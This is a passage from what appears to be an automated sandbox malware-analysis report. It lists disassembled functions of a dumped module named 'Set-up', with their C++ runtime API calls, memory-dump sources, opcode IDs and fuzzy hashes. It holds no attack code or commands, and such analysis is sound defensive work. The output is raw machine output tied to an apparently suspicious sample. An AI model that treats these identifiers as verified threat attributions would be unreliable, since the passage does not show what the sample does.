                                                                                              • Instruction Fuzzy Hash: 70418E311087818FC714CF68C485B9AFBF4BF96314F900A6DF1A6972D1EBB4AA45CB52
                                                                                              Function 6BC2DC06 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2DC0D
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2DC35
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000014), ref: 6BC2DC5D
                                                                                              • ?sbumpc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000014), ref: 6BC2DC8C
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2DCCD
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,?,00000001,?,00000014), ref: 6BC2DD01
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?sgetc@?$basic_streambuf@_H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?sbumpc@?$basic_streambuf@_?setstate@?$basic_ios@_?snextc@?$basic_streambuf@_Ipfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 585914602-0
                                                                                              • Opcode ID: 710a88214ad1b796cfd27b5f65fb55cd50146ab8724a1a01648100bd059a05e0
                                                                                              • Instruction ID: 1c4970676b5d4fcef88cd2f4feb50f2c2d632090afe3b58840a19dcb91ed9a60
                                                                                              • Opcode Fuzzy Hash: 710a88214ad1b796cfd27b5f65fb55cd50146ab8724a1a01648100bd059a05e0
                                                                                              • Instruction Fuzzy Hash: DE318C70961645CFCB20DF69C58099AB7B0FF65324B5085AEE4DA9B3A0E7789B01CF50
                                                                                              Function 6BC2C384 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2C38B
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2C3B3
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000001,?,00000014), ref: 6BC2C3DB
                                                                                              • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000001,?,00000014), ref: 6BC2C401
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2C43F
                                                                                              • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(?,?,00000001,?,00000014), ref: 6BC2C471
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?sgetc@?$basic_streambuf@H_prolog3_catchU?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?sbumpc@?$basic_streambuf@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@Ipfx@?$basic_istream@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 3486570414-0
                                                                                              • Opcode ID: 13beb9d66dd38ccbc8302e00b1298c3571b41fe611b63c95d4a961daf733f445
                                                                                              • Instruction ID: 01efb8e3c77fd82c61b28ecdd6563ef76ccab8deeec0d16fded6fdad6c99115c
                                                                                              • Opcode Fuzzy Hash: 13beb9d66dd38ccbc8302e00b1298c3571b41fe611b63c95d4a961daf733f445
                                                                                              • Instruction Fuzzy Hash: 2B31AB70915749CFCB20CF69C4819AABBF0BF44328B10855EE4A6972A1E738EB01CF51
                                                                                              Function 6BC4327A Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: String__crt$___lc_handle_func_malloc_crtfreememcpy
                                                                                              • String ID:
                                                                                              • API String ID: 1881293509-0
                                                                                              • Opcode ID: 62a2207f7378e001765b134a8f68d080f95e3f460f5b1ca5a48f1be912e45d6e
                                                                                              • Instruction ID: 74976f6ffd55b228beaed413bea28dfe6c96d0ae00745bb6972c1de96974ae34
                                                                                              • Opcode Fuzzy Hash: 62a2207f7378e001765b134a8f68d080f95e3f460f5b1ca5a48f1be912e45d6e
                                                                                              • Instruction Fuzzy Hash: E721D072614206AFDB208FA9DC8489A3BB9FFC9724F144135FC14D7250EB38DB128BA0
                                                                                              Function 6BC18C82 Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,C18D2153,?), ref: 6BC18CBD
                                                                                              • ??1_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC18CD4
                                                                                              • ??0_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?), ref: 6BC18CF1
                                                                                              • ??1_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC18D04
                                                                                              • ??1_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC18D30
                                                                                              • ?_Xfunc@tr1@std@@YAXXZ.MSVCP100 ref: 6BC18D44
                                                                                                • Part of subcall function 6BC2049E: ??0exception@std@@QAE@XZ.MSVCR100 ref: 6BC204A9
                                                                                                • Part of subcall function 6BC2049E: _CxxThrowException.MSVCR100(?,6BC48440), ref: 6BC204BF
                                                                                                • Part of subcall function 6BC2049E: ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC48440), ref: 6BC204D5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@Lock@details@ReentrantScoped_lock@_$??1_$??0_??0exception@std@@V123@@$ExceptionThrowV01@@Xfunc@tr1@std@@
                                                                                              • String ID:
                                                                                              • API String ID: 2011713233-0
                                                                                              • Opcode ID: ebf7b85c50e2bc1ce2e0beff0508584cf81bd6f2f4a6a828f5e13dc9bb005024
                                                                                              • Instruction ID: c9f9c08c47e8927ca8edef129429210f270eb32fefefdb8784fb0ad5ab54ed28
                                                                                              • Opcode Fuzzy Hash: ebf7b85c50e2bc1ce2e0beff0508584cf81bd6f2f4a6a828f5e13dc9bb005024
                                                                                              • Instruction Fuzzy Hash: A42168311087499FC314DF29C895E5AB7F8FB89324F104B2DE0A6836E0EB35EA05CB51
                                                                                              Function 6BC1D0C8 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?_Tidy@ios_base@std@@AAEXXZ.MSVCP100(?,?,?,?,6BC1CD61,?), ref: 6BC1D0DD
                                                                                                • Part of subcall function 6BC1D35A: std::ios_base::_Callfns.LIBCPMT(00000000,?,?,?,6BC1D0E2,?,?,?,?,6BC1CD61,?), ref: 6BC1D363
                                                                                                • Part of subcall function 6BC1D35A: ??3@YAXPAX@Z.MSVCR100(?,00000000,?,?,?,6BC1D0E2,?,?,?,?,6BC1CD61,?), ref: 6BC1D378
                                                                                                • Part of subcall function 6BC1D35A: ??3@YAXPAX@Z.MSVCR100(?,00000000,?,?,?,6BC1D0E2,?,?,?,?,6BC1CD61,?), ref: 6BC1D38F
                                                                                                • Part of subcall function 6BC1BBC4: std::locale::facet::_Decref.LIBCPMT(?,?,?,6BC1D0ED,?,?,?,?,?,6BC1CD61,?), ref: 6BC1BBD6
                                                                                                • Part of subcall function 6BC1BBC4: std::locale::facet::_Incref.LIBCPMT(?,?,?,6BC1D0ED,?,?,?,?,?,6BC1CD61,?), ref: 6BC1BBEB
                                                                                              • ?_Findarr@ios_base@std@@AAEAAU_Iosarray@12@H@Z.MSVCP100(?,?,?,?,?,?,?,?,6BC1CD61,?), ref: 6BC1D125
                                                                                              • ?_Findarr@ios_base@std@@AAEAAU_Iosarray@12@H@Z.MSVCP100(?,?,?,?,?,?,?,?,?,6BC1CD61,?), ref: 6BC1D135
                                                                                              • ?register_callback@ios_base@std@@QAEXP6AXW4event@12@AAV12@H@ZH@Z.MSVCP100(00000000,?,?,?,?,?,?,?,?,?,?,6BC1CD61,?), ref: 6BC1D151
                                                                                                • Part of subcall function 6BC1D091: ??2@YAPAXI@Z.MSVCR100(0000000C,?,?,6BC1D156,00000000,?,?,?,?,?,?,?,?,?,?,6BC1CD61), ref: 6BC1D09B
                                                                                              • std::ios_base::_Callfns.LIBCPMT(00000002,00000000,?,?,?,?,?,?,?,?,?,?,6BC1CD61,?), ref: 6BC1D160
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,?,00000002,00000000,?,?,?,?,?,?,?,?,?,?,6BC1CD61,?), ref: 6BC1D174
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@CallfnsFindarr@ios_base@std@@Iosarray@12@std::ios_base::_std::locale::facet::_$??2@?clear@ios_base@std@@?register_callback@ios_base@std@@DecrefIncrefTidy@ios_base@std@@V12@W4event@12@
                                                                                              • String ID:
                                                                                              • API String ID: 3859176867-0
                                                                                              • Opcode ID: 20296c236b386687ac7b1ab9ac8b58a1ceadbb96327182b86a161518941ce1ee
                                                                                              • Instruction ID: 268f25b1e0abbf8fe963c2c64fd295fb716e217613ad3f3e6b56d3bdb3d9f263
                                                                                              • Opcode Fuzzy Hash: 20296c236b386687ac7b1ab9ac8b58a1ceadbb96327182b86a161518941ce1ee
                                                                                              • Instruction Fuzzy Hash: FE217870664B10AFCB10CF29C480A06BBF5BF48721B148659E8099BB11E738F950DBA0
                                                                                              Function 6BC2DAE7 Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2DAEE
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2DB14
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000014), ref: 6BC2DB30
                                                                                              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP100(?,00000001,?,00000014), ref: 6BC2DB55
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,00000001,?,00000014), ref: 6BC2DB79
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2DBA7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?sgetc@?$basic_streambuf@_H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@_?sputc@?$basic_streambuf@_Ipfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 4272017878-0
                                                                                              • Opcode ID: 6ac899505b1f3d6feac345436ba97b7db585a60c4f2d35b8f338aadbfb9826e9
                                                                                              • Instruction ID: e66e4c3b216375d572c9e5e0136a7ef54867856f098e36ce16a1da9606c8d9bd
                                                                                              • Opcode Fuzzy Hash: 6ac899505b1f3d6feac345436ba97b7db585a60c4f2d35b8f338aadbfb9826e9
                                                                                              • Instruction Fuzzy Hash: E5219074955245CFCB10DF99C591AADFBF0BFA4314F50808DE492AB2A0E738AB41DF90
                                                                                              Function 6BC2F02B Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2F032
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000), ref: 6BC2F055
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000000), ref: 6BC2F079
                                                                                              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP100(?,00000000), ref: 6BC2F097
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,00000000), ref: 6BC2F0BC
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(00000000,00000000,00000000), ref: 6BC2F0EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?sgetc@?$basic_streambuf@_H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@_?sputc@?$basic_streambuf@_G@std@@@std@@Ipfx@?$basic_istream@U?$char_traits@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2946896089-0
                                                                                              • Opcode ID: 8506c4403f1901b36992a097b61158ad266c37dd311fe61110f744f750d4b6cb
                                                                                              • Instruction ID: 07629bd0874cbaae757fe7945164e77a4062f336e1666ab7820f5829eaf10967
                                                                                              • Opcode Fuzzy Hash: 8506c4403f1901b36992a097b61158ad266c37dd311fe61110f744f750d4b6cb
                                                                                              • Instruction Fuzzy Hash: F221C274919289CFCB14CFA8C561BADBBF1AF59304F50409DD086AB381DB798B05DB60
                                                                                              Function 6BC2C26D Relevance: 9.1, APIs: 6, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2C274
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2C29C
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000001,?,00000014), ref: 6BC2C2B8
                                                                                              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP100(?,00000001,?,00000014), ref: 6BC2C2D4
                                                                                              • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(?,00000001,?,00000014), ref: 6BC2C2F4
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2C323
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?sgetc@?$basic_streambuf@H_prolog3_catchU?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@?sputc@?$basic_streambuf@Ipfx@?$basic_istream@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2906793984-0
                                                                                              • Opcode ID: 9b4465b42a09646b37e69e2cef1d65bdd5d2135bae1e855ab01c4d23a0956c96
                                                                                              • Instruction ID: b7f1924dc1907ab8230f3c4fd08a8dcd28318ed8deee854ebd5ce8df6e5183ea
                                                                                              • Opcode Fuzzy Hash: 9b4465b42a09646b37e69e2cef1d65bdd5d2135bae1e855ab01c4d23a0956c96
                                                                                              • Instruction Fuzzy Hash: 8E216D71915748CFCB10CFA9C58199EFBF0BF58314B60859ED0A6A72A1EB38EB01DB51
                                                                                              Function 6BC2BF32 Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2BF39
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000), ref: 6BC2BF5C
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000000), ref: 6BC2BF80
                                                                                              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP100(00000000,00000000), ref: 6BC2BF96
                                                                                              • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000000,00000000), ref: 6BC2BFB3
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(00000000,00000000,00000000), ref: 6BC2BFE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?sgetc@?$basic_streambuf@H_prolog3_catchU?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@?sputc@?$basic_streambuf@Ipfx@?$basic_istream@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2906793984-0
                                                                                              • Opcode ID: f0c7d073a5249b86f2e7e9636b671b33c2c2c0abe70df13091a146922ff57149
                                                                                              • Instruction ID: b9ab7d170f5dd4e076860ffb66f0cda7cd9c5da10c73570b94c9f0e2ed8c6ea9
                                                                                              • Opcode Fuzzy Hash: f0c7d073a5249b86f2e7e9636b671b33c2c2c0abe70df13091a146922ff57149
                                                                                              • Instruction Fuzzy Hash: BB21D178919244DFCB10CFA8C5A1B9CBBB0AF49318F10818DE091A7291EB389B05DB51
                                                                                              Function 6BC3ACBD Relevance: 9.1, APIs: 6, Instructions: 55COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
